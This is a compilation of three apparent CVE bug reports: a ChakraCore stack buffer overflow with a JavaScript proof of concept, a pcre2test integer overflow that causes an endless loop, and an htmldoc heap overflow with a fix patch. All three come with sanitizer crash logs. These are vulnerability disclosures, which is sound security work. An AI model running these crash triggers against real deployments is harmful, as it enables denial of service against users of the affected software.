ChakraCore branch master cbb9b was discovered to contain a stack overflow vulnerability via the function Js::ScopeSlots::IsDebuggerScopeSlotArray().

Branch: master  
Commit : cbb9b101d18e4c1682ca39a52a201d8e4241ea17  
POC :

    function Run() {
        var intl = new Intl.Collator();
        intl.compare('a','b');/**bp:resume('step_into');locals()**/
        let C1 = class NotC1 {
        attemptOuterBindingChange() { C1 = 1; }
        attemptInnerBindingChange() { NotC1 = 1; }
        outerbindingUnmodified() { return C1 !== 1; }
        innerbindingUnmodified() { return NotC1 !== 1; }
    }.Echo('PASS');
    }
    
    WScript.Attach(Run);
    

In release build, ./build.sh --sanitize=address --static -j  
I get the following log:

    ==10284==ERROR: AddressSanitizer: dynamic-stack-buffer-overflow on address 0x7ffcceecb558 at pc 0x55bf9a7362b3 bp 0x7ffcceec3300 sp 0x7ffcceec32f8
    READ of size 8 at 0x7ffcceecb558 thread T0
        #0 0x55bf9a7362b2 in Js::ScopeSlots::IsDebuggerScopeSlotArray() (/root/ChakraCore-latest/out/Release/ch+0x6d42b2)
        #1 0x55bf9a918523 in Js::SlotArrayVariablesWalker::PopulateMembers() (/root/ChakraCore-latest/out/Release/ch+0x8b6523)
        #2 0x55bf9a916f14 in Js::VariableWalkerBase::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8b4f14)
        #3 0x55bf9a91ed1a in Js::DiagScopeVariablesWalker::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8bcd1a)
        #4 0x55bf9a924b4c in Js::LocalsWalker::GetChildrenCount() (/root/ChakraCore-latest/out/Release/ch+0x8c2b4c)
        #5 0x55bf9a55b7ca in JsrtDebuggerStackFrame::GetLocalsObject(Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x4f97ca)
        #6 0x55bf9a5ed7f5 in JsDiagGetStackProperties (/root/ChakraCore-latest/out/Release/ch+0x58b7f5)
        #7 0x55bf9a41c96b in Debugger::GetStackProperties(void*, bool, void**, unsigned short, void*) (/root/ChakraCore-latest/out/Release/ch+0x3ba96b)
        #8 0x55bf9b012f61 in Js::JavascriptExternalFunction::StdCallExternalFunctionThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb0f61)
        #9 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #10 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
        #11 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #12 0x55bf9b024e91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
        #13 0x55bf9b0174ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
        #14 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #15 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
        #16 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #17 0x55bf9adbe385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
        #18 0x55bf9adbdde1 in void Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5bde1)
        #19 0x55bf9ab602d9 in Js::InterpreterStackFrame::ProcessProfiled() (/root/ChakraCore-latest/out/Release/ch+0xafe2d9)
        #20 0x55bf9aab41dd in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa521dd)
        #21 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
        #22 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
        #23 0x7f43138e1f41  (<unknown module>)
        #24 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #25 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
        #26 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #27 0x55bf9adbb9c5 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd599c5)
        #28 0x55bf9aaef893 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8d893)
        #29 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
        #30 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
        #31 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
        #32 0x7f43138e1eb9  (<unknown module>)
        #33 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #34 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
        #35 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #36 0x55bf9b024e91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
        #37 0x55bf9b0174ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
        #38 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #39 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
        #40 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #41 0x55bf9adbe385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
        #42 0x55bf9aaeed79 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8cd79)
        #43 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
        #44 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
        #45 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
        #46 0x7f43138e1ef1  (<unknown module>)
        #47 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #48 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
        #49 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #50 0x55bf9adbbb55 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd59b55)
        #51 0x55bf9aaef893 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8d893)
        #52 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
        #53 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
        #54 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
        #55 0x7f43138e1f01  (<unknown module>)
        #56 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #57 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
        #58 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #59 0x55bf9b024e91 in void* Js::JavascriptFunction::CalloutHelper<false>(Js::RecyclableObject*, void*, void*, void*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0xfc2e91)
        #60 0x55bf9b0174ef in Js::JavascriptFunction::EntryApply(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0xfb54ef)
        #61 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #62 0x55bf9a781446 in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f446)
        #63 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #64 0x55bf9adbe385 in void Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (/root/ChakraCore-latest/out/Release/ch+0xd5c385)
        #65 0x55bf9aaeed79 in Js::InterpreterStackFrame::ProcessUnprofiled() (/root/ChakraCore-latest/out/Release/ch+0xa8cd79)
        #66 0x55bf9aab424a in Js::InterpreterStackFrame::Process() (/root/ChakraCore-latest/out/Release/ch+0xa5224a)
        #67 0x55bf9aab256f in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa5056f)
        #68 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
        #69 0x7f43138e1f09  (<unknown module>)
        #70 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #71 0x55bf9a78331a in Js::ScriptContext::ProfileModeThunk_DebugModeWrapper(Js::JavascriptFunction*, Js::ScriptContext*, void* (*)(Js::RecyclableObject*, Js::CallInfo, ...), Js::Arguments&) (/root/ChakraCore-latest/out/Release/ch+0x72131a)
        #72 0x55bf9a78136d in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f36d)
        #73 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #74 0x55bf9b018a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
        #75 0x55bf9b01872f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
        #76 0x55bf9a51175a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
        #77 0x55bf9a41ec15 in Debugger::CallFunction(char const*, void**, void*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3bcc15)
        #78 0x55bf9a41b319 in Debugger::HandleDebugEvent(_JsDiagDebugEvent, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b9319)
        #79 0x55bf9a550d20 in JsrtDebugManager::CallDebugEventCallback(_JsDiagDebugEvent, Js::DynamicObject*, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0x4eed20)
        #80 0x55bf9a551f0a in JsrtDebugManager::CallDebugEventCallbackForBreak(_JsDiagDebugEvent, Js::DynamicObject*, Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x4eff0a)
        #81 0x55bf9a54f7c3 in JsrtDebugManager::ReportBreak(Js::InterpreterHaltState*) (/root/ChakraCore-latest/out/Release/ch+0x4ed7c3)
        #82 0x55bf9a54f2a5 in JsrtDebugManager::DispatchHalt(Js::InterpreterHaltState*) (/root/ChakraCore-latest/out/Release/ch+0x4ed2a5)
        #83 0x55bf9a95adc9 in Js::ProbeContainer::DispatchStepHandler(Js::InterpreterHaltState*, Js::OpCode*) (/root/ChakraCore-latest/out/Release/ch+0x8f8dc9)
        #84 0x55bf9aacd2a0 in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa6b2a0)
        #85 0x55bf9aab3b77 in Js::InterpreterStackFrame::DebugProcess() (/root/ChakraCore-latest/out/Release/ch+0xa51b77)
        #86 0x55bf9aab2981 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) (/root/ChakraCore-latest/out/Release/ch+0xa50981)
        #87 0x55bf9aab18ab in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) (/root/ChakraCore-latest/out/Release/ch+0xa4f8ab)
        #88 0x7f43138e0f99  (<unknown module>)
        #89 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #90 0x55bf9a78165a in Js::ScriptContext::DebugProfileProbeThunk(Js::RecyclableObject*, Js::CallInfo, ...) (/root/ChakraCore-latest/out/Release/ch+0x71f65a)
        #91 0x55bf9b39cffd in amd64_CallFunction (/root/ChakraCore-latest/out/Release/ch+0x133affd)
        #92 0x55bf9b018a61 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb6a61)
        #93 0x55bf9b01872f in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) (/root/ChakraCore-latest/out/Release/ch+0xfb672f)
        #94 0x55bf9a51175a in JsCallFunction (/root/ChakraCore-latest/out/Release/ch+0x4af75a)
        #95 0x55bf9a439b1a in WScriptJsrt::CallbackMessage::CallFunction(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3d7b1a)
        #96 0x55bf9a43ce0b in CustomMessage<WScriptJsrt::AttachCallback(void*, bool, void**, unsigned short, void*)::$_1, WScriptJsrt::CallbackMessage>::Call(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3dae0b)
        #97 0x55bf9a416804 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) (/root/ChakraCore-latest/out/Release/ch+0x3b4804)
        #98 0x55bf9a419913 in ExecuteTest(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3b7913)
        #99 0x55bf9a41a606 in main (/root/ChakraCore-latest/out/Release/ch+0x3b8606)
        #100 0x7f4317ecfc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #101 0x55bf9a318d59 in _start (/root/ChakraCore-latest/out/Release/ch+0x2b6d59)
    
    Address 0x7ffcceecb558 is located in stack of thread T0 at offset 2968 in frame
        #0 0x55bf9aacc8bf in Js::InterpreterStackFrame::ProcessWithDebugging() (/root/ChakraCore-latest/out/Release/ch+0xa6a8bf)
    
      This frame has 22 object(s):
        [32, 40) 'thisVar.i'
        [64, 70) 'ldElemInfo.i'
        [96, 112) 'agg.tmp36.i.i'
        [128, 144) 'agg.tmp2.i.i.i.i3477'
        [160, 176) 'agg.tmp2.i.i.i.i3459'
        [192, 208) 'agg.tmp2.i.i.i.i3436'
        [224, 240) 'agg.tmp2.i.i.i.i'
        [256, 272) 'agg.tmp2.i.i.i'
        [288, 352) 'info.i.i3194'
        [384, 448) 'info.i.i3153'
        [480, 544) 'info.i.i3117'
        [576, 640) 'info.i.i3087'
        [672, 736) 'info.i.i'
        [768, 776) 'ip.addr.i'
        [800, 808) 'ip'
        [832, 834) 'op'
        [848, 912) 'haltState'
        [944, 1008) 'haltState83'
        [1040, 1048) 'yieldValue'
        [1072, 1080) 'yieldValue1592'
        [1104, 1168) 'haltState1625'
        [1200, 1264) 'haltState1672' <== Memory access at offset 2968 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: dynamic-stack-buffer-overflow (/root/ChakraCore-latest/out/Release/ch+0x6d42b2) in Js::ScopeSlots::IsDebuggerScopeSlotArray()
    Shadow bytes around the buggy address:
      0x100019dd1650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100019dd1660: ca ca ca ca 00 00 00 00 00 00 00 00 00 00 00 00
      0x100019dd1670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100019dd1680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100019dd1690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x100019dd16a0: 00 00 00 00 00 cb cb cb cb cb cb[cb]f1 f1 f1 f1
      0x100019dd16b0: f8 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
      0x100019dd16c0: f8 f2 f2 f2 f8 f3 f3 f3 00 00 00 00 00 00 00 00
      0x100019dd16d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100019dd16e0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
      0x100019dd16f0: 00 00 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==10284==ABORTING

CVE-2023-37139: dynamic-stack-buffer-overflow in release build · Issue #6884 · chakra-core/ChakraCore

Integer overflow vulnerability in pcre2test before 10.41 allows attackers to cause a denial of service or other unspecified impacts via negative input.

**Bug Description**

Hi, we find 151 input files and pcre2test could not terminate in 60 minutes while processing them, which may trigger some dead loops.

We select one simplest input file (decompress it) to analyze the bug and the results of our analysis are as follows. (Maybe there are other situations.)

**Bug Analysis**

We find an endless looping may in pcre2test.c:6860  
With the input (decompress it).

The relevant code snippet is as follows.

    li \= strtol((const char \*)p, &endptr, 10);
    i \= (int32\_t)li;
    if (i\-- \== 0) {// ...}
    // ...
    replen \= CAST8VAR(q) \- start\_rep;
    needlen += replen \* i;

      if (needlen >= dbuffer\_size)
      {
      // ...
6860: while (needlen >= dbuffer\_size) dbuffer\_size \*= 2;
      // ...
      }

1.  p = "-10", li = i = -10
2.  With i--, i = -11
3.  With replen = CAST8VAR(q) - start_rep;, replen = 1
4.  With initial value 10 and needlen += replen * i, needlen = -1 = 2 ^ 64 -1, as type(needlen) = size_t
5.  Then an endless looping occurs in line: 6860.
    *   In fact, the while entry condition is vulnerable. With needlen ∈ \[ 2 ^ 63, 2 ^ 64), the while is very easy to trap into endless looping.

**How to reproduce**

1.  Download the pcre2 source code with the official link and build it.
    *   ./autogen.sh
    *   CC=gcc CXX=g++ ./configure --disable-shared --prefix=...
    *   make -j 8
    *   make install
2.  Executing prec2test with the provided input files
    *   Decompress the zip to get all the input files.
    *   cd <your install directory>
    *   ./bin/pcre2test <any input file in the zip>

CVE-2022-41409: [Bug report] Endless looping in pcre2test (v10.41, commit id:3a1ad4 ) · Issue #141 · PCRE2Project/pcre2

A flaw was discovered in htmodoc 1.9.12 in function parse_paragraph in ps-pdf.cxx ,this flaw possibly allows possible code execution and a denial of service via a crafted file.

Hi,

A heap overflow was found in function parse\_paragraph() in ps-pdf.cxx at line 5015. Didn't check whether prev->data is vaild.

    ── source:ps-pdf.cxx+5015 ────
       5010	 	{
       5011	 	  break;
       5012	 	}
       5013	 	else if (prev->markup == MARKUP_NONE)
       5014	 	{
                         // ch=0x0, prev=0x00007fffffffd058  →  0x000000000098ff10
    ●→ 5015	 	  int	ch = prev->data[strlen((char *)prev->data) - 1];
       5016
       5017	 	  if (_htmlUTF8)
       5018	 	    ch = _htmlUnicode[ch];
       5019
       5020	           if (ch == 173)
    ────────────────────────────────────
    gef➤  p prev
    $1 = (tree_t *) 0x98ff10
    gef➤  p prev->data
    Cannot access memory at address 0x98ff48
    

\*\*potential fix patch \*\*

    --- ./htmldoc/ps-pdf.cxx        
    +++ ./htmldoc/ps-pdf-tryfix.cxx 
    @@ -5012,7 +5012,11 @@
            }
            else if (prev->markup == MARKUP_NONE)
            {
    -         int   ch = prev->data[strlen((char *)prev->data) - 1];
    +         int ch;
    +         if (!prev->data[0])
    +           break;
    +
    +         ch = prev->data[strlen((char *)prev->data) - 1];
    
              if (_htmlUTF8)
                ch = _htmlUnicode[ch];
    

**Version:**  
1.9.12 commit \[ee77825\]  
**Env:**  
ubuntu 20.04 x86\_64  
clang version 11.0.0

**reproduce**  
./configure  
make  
./htmldoc -f ./check.ps \[poc\]

zipped poc

**detail info**

    ==1701892==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000b98f at pc 0x00000055d6fd bp 0x7ffe4c987670 sp 0x7ffe4c987668
    READ of size 1 at 0x60200000b98f thread T0
        #0 0x55d6fc in parse_paragraph(tree_str*, float, float, float, float, float*, float*, int*, int) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:5015:13
        #1 0x586fe1 in parse_heading(tree_str*, float, float, float, float, float*, float*, int*, int) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:4663:3
        #2 0x511582 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:4197:11
        #3 0x593fd1 in render_table_row(hdtable_t&, tree_str***, int, unsigned char*, float, float, float, float, float*, float*, int*) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:5829:9
        #4 0x584778 in parse_table(tree_str*, float, float, float, float, float*, float*, int*, int) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:7111:5
        #5 0x510e9d in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:4169:11
        #6 0x518f08 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:4515:13
        #7 0x518f08 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:4515:13
        #8 0x518f08 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:4515:13
        #9 0x593fd1 in render_table_row(hdtable_t&, tree_str***, int, unsigned char*, float, float, float, float, float*, float*, int*) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:5829:9
        #10 0x584b20 in parse_table(tree_str*, float, float, float, float, float*, float*, int*, int) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:7125:9
        #11 0x510e9d in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:4169:11
        #12 0x50e351 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:4083:9
        #13 0x50e351 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:4083:9
        #14 0x5098a4 in pspdf_export /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:803:3
        #15 0x4e03e3 in main /home/chiba/htmldoc/htmldoc/htmldoc.cxx:1291:3
        #16 0x7fde4d9200b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #17 0x41d85d in _start (/home/chiba/htmldoc/check-sani/bin/htmldoc+0x41d85d)
    
    0x60200000b98f is located 1 bytes to the left of 2-byte region [0x60200000b990,0x60200000b992)
    allocated by thread T0 here:
        #0 0x4838e4 in strdup (/home/chiba/htmldoc/check-sani/bin/htmldoc+0x4838e4)
        #1 0x5cba34 in insert_space(tree_str*, tree_str*) /home/chiba/htmldoc/htmldoc/htmllib.cxx:2694:28
        #2 0x5c018a in htmlReadFile /home/chiba/htmldoc/htmldoc/htmllib.cxx:959:6
        #3 0x4e3b89 in read_file(char const*, tree_str**, char const*) /home/chiba/htmldoc/htmldoc/htmldoc.cxx:2492:9
        #4 0x4dfb8f in main /home/chiba/htmldoc/htmldoc/htmldoc.cxx:1177:7
        #5 0x7fde4d9200b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/chiba/htmldoc/htmldoc/ps-pdf.cxx:5015:13 in parse_paragraph(tree_str*, float, float, float, float, float*, float*, int*, int)
    Shadow bytes around the buggy address:
      0x0c047fff96e0: fa fa 00 07 fa fa fd fd fa fa 06 fa fa fa 03 fa
      0x0c047fff96f0: fa fa 07 fa fa fa 03 fa fa fa 07 fa fa fa 00 02
      0x0c047fff9700: fa fa 03 fa fa fa 03 fa fa fa 05 fa fa fa 06 fa
      0x0c047fff9710: fa fa 00 fa fa fa 00 02 fa fa fd fd fa fa 04 fa
      0x0c047fff9720: fa fa 06 fa fa fa 03 fa fa fa 07 fa fa fa 03 fa
    =>0x0c047fff9730: fa[fa]02 fa fa fa 00 fa fa fa 00 07 fa fa 03 fa
      0x0c047fff9740: fa fa 03 fa fa fa 05 fa fa fa 00 03 fa fa 03 fa
      0x0c047fff9750: fa fa 03 fa fa fa 05 fa fa fa 00 04 fa fa 00 06
      0x0c047fff9760: fa fa 05 fa fa fa 00 02 fa fa 03 fa fa fa 04 fa
      0x0c047fff9770: fa fa 05 fa fa fa 00 03 fa fa 03 fa fa fa 04 fa
      0x0c047fff9780: fa fa 05 fa fa fa 00 07 fa fa fd fd fa fa 02 fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
